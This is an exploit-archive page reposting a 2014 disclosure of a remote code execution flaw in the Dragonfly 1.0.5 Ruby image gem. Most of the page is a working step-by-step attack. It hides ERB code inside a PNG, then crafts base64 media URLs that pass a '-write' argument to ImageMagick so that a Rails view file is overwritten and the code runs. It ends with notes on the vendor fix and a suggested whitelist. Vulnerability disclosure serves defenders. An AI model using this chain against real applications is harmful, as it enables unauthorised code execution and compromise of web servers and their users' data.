Home / exploitsPDF  

Dragonfly 1.0.5 Remote Code Execution

Posted on 26 August 2014

RCE in the Dragonfly gem for image uploading & processing in rails/sinatra, in version 1.0.5. (https://github.com/markevans/dragonfly) The underlaying vulnerability is that you can pass arbitrary commands to imagemagicks convert, thus granting arbitrary read/write for the filesystem. Additionally the -process flag seems to be able to load custom modules, which might result in execution of arbitrary files. Here is a description of _one_ way of how to abuse the RCE vulnerability: $cat exploit.rb <%= puts "I got ownd" %> <% require 'pry' %> <% binding.pry %> $wc exploit.rb 3 13 63 exploit.rb char length needs to be multiple of 3 (21x3 = 63) because every pixel in a png will contain 1 byte $ convert -size "21x1" -depth 8 rgb:exploit.rb exploit.png test that everything went well: $convert exploit.png test.rgb diff should not show any diffs: $diff -v test.rgb exploit.rb upload the picture copy the image url eg: http://domain.tld/media/W1siZiIsIjIwMTQvMDgvMTAvN2k3ajIxNWxoZ19leHBsb2l0LnBuZyJdLFsicCIsInRodW1iIiwiNDAweDIwMCMiXV0 open pry or irb and run: Base64.decode64 "W1siZiIsIjIwMTQvMDgvMTAvN2k3ajIxNWxoZ19leHBsb2l0LnBuZyJdLFsicCIsInRodW1iIiwiNDAweDIwMCMiXV0" => "[["f","2014/08/10/7i7j215lhg_exploit.png"],["p","thumb","400x200#"]]" Base64.strict_encode64 [["f","2014/08/10/7i7j215lhg_exploit.png"],["p","convert","-write rgb:/path/to/rails/app/views/photos/index.html.erb"]]" => "W1siZiIsIjIwMTQvMDgvMTAvN2k3ajIxNWxoZ19leHBsb2l0LnBuZyJdLFsicCIsImNvbnZlcnQiLCItd3JpdGUgcmdiOi9wYXRoL3RvL3JhaWxzL2FwcC92aWV3cy9waG90b3MvaW5kZXguaHRtbC5lcmIiXV0=" go to your browser and request: http://domain.tld/media/W1siZiIsIjIwMTQvMDgvMTAvN2k3ajIxNWxoZ19leHBsb2l0LnBuZyJdLFsicCIsImNvbnZlcnQiLCItd3JpdGUgcmdiOi9wYXRoL3RvL3JhaWxzL2FwcC92aWV3cy9waG90b3MvaW5kZXguaHRtbC5lcmIiXV0= and then: http://domain.tld/photos/ which will open app/views/photos/index.html.erb and spawn a pry on the terminal you called rails server from. Of course you can use different imagemagick flags than "write" to achieve the same code execution. So this would really call for a whitelist that restricts the commands that can be send to imagemagick. The author was contacted and committed "fixes" (dragonfly version 1.0.6, https://github.com/markevans/dragonfly/commit/e88afeceb036fe4d44f7c7787c7e988e1350c2dc#diff-d41d8cd98f00b204e9800998ecf8427e). The main fix seems to be "'rename dos_prevention' to 'verify urls (recommended)'". Needless to say, many websites out there will still disable the verification for ease of deployment of e.g. javascript that requests thumbnail versions of images. Note that this vulnerability is still exploitable if the attacker is unable to upload images, by using the generators to "draw" arbitrary images by imagemagick commands. cheers, coco & leex http://hexgolems.com/fd/dragonfly.txt

 

TOP